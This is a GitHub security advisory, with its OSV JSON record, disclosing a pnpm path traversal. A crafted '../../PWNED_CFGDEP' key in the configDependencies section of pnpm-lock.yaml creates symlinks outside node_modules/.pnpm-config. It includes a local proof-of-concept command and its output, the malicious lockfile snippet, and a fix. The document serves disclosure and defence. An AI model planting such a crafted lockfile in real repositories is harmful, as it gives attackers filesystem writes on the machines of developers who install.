GHSA-QRV3-253H-G69C
Vulnerability from github – Published: 2026-06-27 00:13 – Updated: 2026-06-27 00:13Summary
pnpm accepts package names from the env lockfile configDependencies section and uses those names directly when creating config dependency symlinks under node_modules/.pnpm-config.
A malicious repository can commit a crafted pnpm-lock.yaml whose env-lockfile document contains a traversal-shaped config dependency name such as ../../PWNED_CFGDEP. During pnpm install, pnpm installs the config dependency and creates a symlink at a path derived from that name.
In local testing against pnpm v11.5.1, this caused pnpm to create a symlink outside the intended config dependency directory:
expected root: /tmp/pnpm-cfgdep-poc-sznwgunx/victim/node_modules/.pnpm-config
actual path: /tmp/pnpm-cfgdep-poc-sznwgunx/victim/PWNED_CFGDEP
This works with --ignore-scripts, so it does not rely on lifecycle script execution.
Vulnerable behavior
The vulnerable behavior appears to be that configDependencies keys from the env lockfile are trusted as package names and used in filesystem paths without rejecting traversal components.
The relevant pattern is:
const configModulesDir = path.join(opts.rootDir, 'node_modules/.pnpm-config')
for (const [pkgName, pkg] of Object.entries(normalizedDeps)) {
const configDepPath = path.join(configModulesDir, pkgName)
const pkgDirInGlobalVirtualStore = path.join(
globalVirtualStoreDir,
relPath,
'node_modules',
pkgName
)
await symlinkDir(pkgDirInGlobalVirtualStore, configDepPath)
}
If pkgName is attacker-controlled and contains .., then path.join(configModulesDir, pkgName) can resolve outside node_modules/.pnpm-config.
Impact
A malicious project can cause pnpm to create symlinks outside the intended node_modules/.pnpm-config directory during install.
This gives an attacker a filesystem write primitive in the victim project directory, and potentially outside it with deeper traversal payloads, depending on path permissions and platform behavior.
The issue is especially relevant because:
- The malicious input is committed in
pnpm-lock.yaml. - The issue is triggered during
pnpm install. - It works with
--ignore-scripts. - It occurs in the config dependency installation path, before ordinary dependency installation.
- The user only needs to install a malicious or compromised repository.
Local proof of concept
The following local-only PoC creates a temporary project, starts a local fake registry on 127.0.0.1, writes a malicious env-lockfile entry, runs pnpm, and checks whether pnpm created a symlink outside node_modules/.pnpm-config.
Command used:
python3 ../pnpm_configdeps_path_traversal_poc.py \
--pnpm-cmd "node /home/ethical/pnpm-main/pnpm/bin/pnpm.cjs" \
--keep 2>&1 | tee /tmp/pnpm-configdeps-poc.log
Observed output:
[+] Test project: /tmp/pnpm-cfgdep-poc-sznwgunx/victim
[+] Local registry: http://127.0.0.1:36545/
[+] Store dir: /tmp/pnpm-cfgdep-poc-sznwgunx/store
[+] Malicious name: '../../PWNED_CFGDEP'
[+] Intended cfg root: /tmp/pnpm-cfgdep-poc-sznwgunx/victim/node_modules/.pnpm-config
[+] Traversal sink: /tmp/pnpm-cfgdep-poc-sznwgunx/victim/PWNED_CFGDEP
[+] Lockfile written: /tmp/pnpm-cfgdep-poc-sznwgunx/victim/pnpm-lock.yaml
[+] Running: node /home/ethical/pnpm-main/pnpm/bin/pnpm.cjs install --ignore-scripts --config.confirmModulesPurge=false --reporter=append-only --store-dir /tmp/pnpm-cfgdep-poc-sznwgunx/store --registry http://127.0.0.1:36545/
pnpm output:
Installing config dependencies...
Installed config dependencies: ../../PWNED_CFGDEP@1.0.0, legit-config-dep@1.0.0
Already up to date
Done in 906ms using pnpm v11.5.1
The PoC then detected the escaped symlink:
[+] Traversal sink status: symlink -> ../store/v11/PWNED_CFGDEP/1.0.0/PWNED_CFGDEP
[VULNERABLE] pnpm created/modified a path derived from a lockfile package name outside node_modules/.pnpm-config
sink = /tmp/pnpm-cfgdep-poc-sznwgunx/victim/PWNED_CFGDEP
readlink = ../store/v11/PWNED_CFGDEP/1.0.0/PWNED_CFGDEP
Malicious lockfile structure
The malicious input is an env-lockfile configDependencies key containing traversal components:
importers:
.:
configDependencies:
legit-config-dep:
specifier: '1.0.0'
version: '1.0.0'
'../../PWNED_CFGDEP':
specifier: '1.0.0'
version: '1.0.0'
pnpm accepts the traversal-shaped name and reports it as installed:
Installed config dependencies: ../../PWNED_CFGDEP@1.0.0, legit-config-dep@1.0.0
Security boundary violation
The intended config dependency root was:
/tmp/pnpm-cfgdep-poc-sznwgunx/victim/node_modules/.pnpm-config
But pnpm created:
/tmp/pnpm-cfgdep-poc-sznwgunx/victim/PWNED_CFGDEP
This demonstrates that a config dependency name from the lockfile can escape the directory where config dependencies should be linked.
Suggested remediation
Validate every configDependencies key loaded from the env lockfile before using it as a package name or path component.
Recommended fixes:
- Reject env-lockfile
configDependenciesnames that are not valid npm package names. - Reject names containing absolute paths,
.components,..components, backslashes, or platform-specific path separators. -
Use containment-checked path joining before creating symlinks:
-
resolve the final destination path,
- verify it remains inside
node_modules/.pnpm-config, - reject if it escapes.
- Apply the same validation to config dependency subdependencies and optional dependency names read from the env lockfile.
- Intersect env-lockfile
configDependencieswith the effectivepnpm-workspace.yamlconfigDependenciesbefore installing, so extra lockfile-only entries are rejected.
A safe destination check should enforce behavior equivalent to:
const dest = path.resolve(configModulesDir, pkgName)
if (!dest.startsWith(path.resolve(configModulesDir) + path.sep)) {
throw new Error(`Invalid config dependency name: ${pkgName}`)
}
Name validation should happen before this check, not instead of it.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "pnpm"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.34.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "pnpm"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.8.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-27T00:13:18Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\n`pnpm` accepts package names from the env lockfile `configDependencies` section and uses those names directly when creating config dependency symlinks under `node_modules/.pnpm-config`.\n\nA malicious repository can commit a crafted `pnpm-lock.yaml` whose env-lockfile document contains a traversal-shaped config dependency name such as `../../PWNED_CFGDEP`. During `pnpm install`, pnpm installs the config dependency and creates a symlink at a path derived from that name.\n\nIn local testing against pnpm `v11.5.1`, this caused pnpm to create a symlink outside the intended config dependency directory:\n\n```text\nexpected root: /tmp/pnpm-cfgdep-poc-sznwgunx/victim/node_modules/.pnpm-config\nactual path: /tmp/pnpm-cfgdep-poc-sznwgunx/victim/PWNED_CFGDEP\n```\n\nThis works with `--ignore-scripts`, so it does not rely on lifecycle script execution.\n\n## Vulnerable behavior\n\nThe vulnerable behavior appears to be that `configDependencies` keys from the env lockfile are trusted as package names and used in filesystem paths without rejecting traversal components.\n\nThe relevant pattern is:\n\n```ts\nconst configModulesDir = path.join(opts.rootDir, \u0027node_modules/.pnpm-config\u0027)\n\nfor (const [pkgName, pkg] of Object.entries(normalizedDeps)) {\n const configDepPath = path.join(configModulesDir, pkgName)\n\n const pkgDirInGlobalVirtualStore = path.join(\n globalVirtualStoreDir,\n relPath,\n \u0027node_modules\u0027,\n pkgName\n )\n\n await symlinkDir(pkgDirInGlobalVirtualStore, configDepPath)\n}\n```\n\nIf `pkgName` is attacker-controlled and contains `..`, then `path.join(configModulesDir, pkgName)` can resolve outside `node_modules/.pnpm-config`.\n\n## Impact\n\nA malicious project can cause pnpm to create symlinks outside the intended `node_modules/.pnpm-config` directory during install.\n\nThis gives an attacker a filesystem write primitive in the victim project directory, and potentially outside it with deeper traversal payloads, depending on path permissions and platform behavior.\n\nThe issue is especially relevant because:\n\n* The malicious input is committed in `pnpm-lock.yaml`.\n* The issue is triggered during `pnpm install`.\n* It works with `--ignore-scripts`.\n* It occurs in the config dependency installation path, before ordinary dependency installation.\n* The user only needs to install a malicious or compromised repository.\n\n## Local proof of concept\n\nThe following local-only PoC creates a temporary project, starts a local fake registry on `127.0.0.1`, writes a malicious env-lockfile entry, runs pnpm, and checks whether pnpm created a symlink outside `node_modules/.pnpm-config`.\n\nCommand used:\n\n```bash\npython3 ../pnpm_configdeps_path_traversal_poc.py \\\n --pnpm-cmd \"node /home/ethical/pnpm-main/pnpm/bin/pnpm.cjs\" \\\n --keep 2\u003e\u00261 | tee /tmp/pnpm-configdeps-poc.log\n```\n\nObserved output:\n\n```text\n[+] Test project: /tmp/pnpm-cfgdep-poc-sznwgunx/victim\n[+] Local registry: http://127.0.0.1:36545/\n[+] Store dir: /tmp/pnpm-cfgdep-poc-sznwgunx/store\n[+] Malicious name: \u0027../../PWNED_CFGDEP\u0027\n[+] Intended cfg root: /tmp/pnpm-cfgdep-poc-sznwgunx/victim/node_modules/.pnpm-config\n[+] Traversal sink: /tmp/pnpm-cfgdep-poc-sznwgunx/victim/PWNED_CFGDEP\n[+] Lockfile written: /tmp/pnpm-cfgdep-poc-sznwgunx/victim/pnpm-lock.yaml\n[+] Running: node /home/ethical/pnpm-main/pnpm/bin/pnpm.cjs install --ignore-scripts --config.confirmModulesPurge=false --reporter=append-only --store-dir /tmp/pnpm-cfgdep-poc-sznwgunx/store --registry http://127.0.0.1:36545/\n```\n\npnpm output:\n\n```text\nInstalling config dependencies...\nInstalled config dependencies: ../../PWNED_CFGDEP@1.0.0, legit-config-dep@1.0.0\nAlready up to date\n\nDone in 906ms using pnpm v11.5.1\n```\n\nThe PoC then detected the escaped symlink:\n\n```text\n[+] Traversal sink status: symlink -\u003e ../store/v11/PWNED_CFGDEP/1.0.0/PWNED_CFGDEP\n\n[VULNERABLE] pnpm created/modified a path derived from a lockfile package name outside node_modules/.pnpm-config\n sink = /tmp/pnpm-cfgdep-poc-sznwgunx/victim/PWNED_CFGDEP\n readlink = ../store/v11/PWNED_CFGDEP/1.0.0/PWNED_CFGDEP\n```\n\n## Malicious lockfile structure\n\nThe malicious input is an env-lockfile `configDependencies` key containing traversal components:\n\n```yaml\nimporters:\n .:\n configDependencies:\n legit-config-dep:\n specifier: \u00271.0.0\u0027\n version: \u00271.0.0\u0027\n \u0027../../PWNED_CFGDEP\u0027:\n specifier: \u00271.0.0\u0027\n version: \u00271.0.0\u0027\n```\n\npnpm accepts the traversal-shaped name and reports it as installed:\n\n```text\nInstalled config dependencies: ../../PWNED_CFGDEP@1.0.0, legit-config-dep@1.0.0\n```\n\n## Security boundary violation\n\nThe intended config dependency root was:\n\n```text\n/tmp/pnpm-cfgdep-poc-sznwgunx/victim/node_modules/.pnpm-config\n```\n\nBut pnpm created:\n\n```text\n/tmp/pnpm-cfgdep-poc-sznwgunx/victim/PWNED_CFGDEP\n```\n\nThis demonstrates that a config dependency name from the lockfile can escape the directory where config dependencies should be linked.\n\n## Suggested remediation\n\nValidate every `configDependencies` key loaded from the env lockfile before using it as a package name or path component.\n\nRecommended fixes:\n\n1. Reject env-lockfile `configDependencies` names that are not valid npm package names.\n2. Reject names containing absolute paths, `.` components, `..` components, backslashes, or platform-specific path separators.\n3. Use containment-checked path joining before creating symlinks:\n\n * resolve the final destination path,\n * verify it remains inside `node_modules/.pnpm-config`,\n * reject if it escapes.\n4. Apply the same validation to config dependency subdependencies and optional dependency names read from the env lockfile.\n5. Intersect env-lockfile `configDependencies` with the effective `pnpm-workspace.yaml` `configDependencies` before installing, so extra lockfile-only entries are rejected.\n\nA safe destination check should enforce behavior equivalent to:\n\n```ts\nconst dest = path.resolve(configModulesDir, pkgName)\n\nif (!dest.startsWith(path.resolve(configModulesDir) + path.sep)) {\n throw new Error(`Invalid config dependency name: ${pkgName}`)\n}\n```\n\nName validation should happen before this check, not instead of it.",
"id": "GHSA-qrv3-253h-g69c",
"modified": "2026-06-27T00:13:18Z",
"published": "2026-06-27T00:13:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-qrv3-253h-g69c"
},
{
"type": "PACKAGE",
"url": "https://github.com/pnpm/pnpm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "pnpm: Path traversal in configDependencies env lockfile allows symlink creation outside node_modules/.pnpm-config"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.